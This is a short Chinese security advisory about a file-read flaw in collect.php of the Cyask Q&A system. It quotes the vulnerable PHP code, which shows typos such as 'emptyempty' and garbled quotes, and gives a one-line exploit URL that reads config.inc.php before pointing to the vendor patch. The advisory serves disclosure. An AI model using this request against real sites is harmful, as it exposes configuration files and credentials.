cyask知道系统collect.php页面存在越权漏洞
影响版本:
Cyask
程序介绍:
Cyask国内较为多人使用的仿百度风格的Ask系统。
漏洞分析:
从Collect.php代码当中可以看到
else
{
/*
检查网址
*/
$url=get_referer();
$neturl=emptyempty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);
$collect_url=emptyempty($neturl) ? $url : $neturl;
$contents = ”;
if($fid=@fopen($collect_url,”r“))
{
do
{
$data = fread($fid, 4096);
if (strlen($data) == 0)
{
break;
}
$contents .= $data;
}
while(true);
fclose($fid);
}
else
{
show_message(’collect_url_error’, ”);
exit;
}
漏洞利用:
http://www.target.com/collect.php?neturl=config.inc.php
解决方案:
厂商补丁:
cyask
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
本文地址:/websafe/loudongfenxi/149547.html